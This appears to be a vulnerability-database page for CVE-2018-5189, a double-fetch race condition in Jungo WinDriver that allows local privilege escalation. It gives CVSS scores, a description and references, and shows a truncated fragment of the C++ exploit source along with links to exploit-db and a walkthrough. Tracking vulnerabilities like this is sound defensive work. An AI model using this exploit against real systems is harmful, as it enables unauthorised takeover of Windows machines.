Published: 11/01/2018 Updated: 17/10/2018

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8

VMScore: 725

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Race condition in Jungo Windriver 12.5.1 allows local users to cause a denial of service (buffer overflow) or gain system privileges by flipping pool buffer size, aka a "double fetch" vulnerability.

Vulnerable Product	Search on Vulmon	Subscribe to Product
jungo windriver

// ConsoleApplication1cpp : Defines the entry point for the console application // #include "stdafxh" #include <Windowsh> #include <winioctlh> #define device L"\\\\\\WINDRVR1251" #define SPRAY_SIZE 30000 typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, ...

Collection of windows kernel exploitation and reversing links

Windows-Kernel-Exploitation-Repo #RUMBLE IN THE JUNGO – A CODE EXECUTION WALKTHROUGH – CVE-2018-5189 wwwfidusinfoseccom/jungo-windriver-code-execution-cve-2018-5189/

CWE-119 https://www.fidusinfosec.com/jungo-windriver-code-execution-cve-2018-5189/https://www.exploit-db.com/exploits/43494/https://nvd.nist.gov https://github.com/hackingportal/Windows-Kernel-Exploitation-Repo https://www.exploit-db.com/exploits/43494/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2018-5189

Vulnerability Summary

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect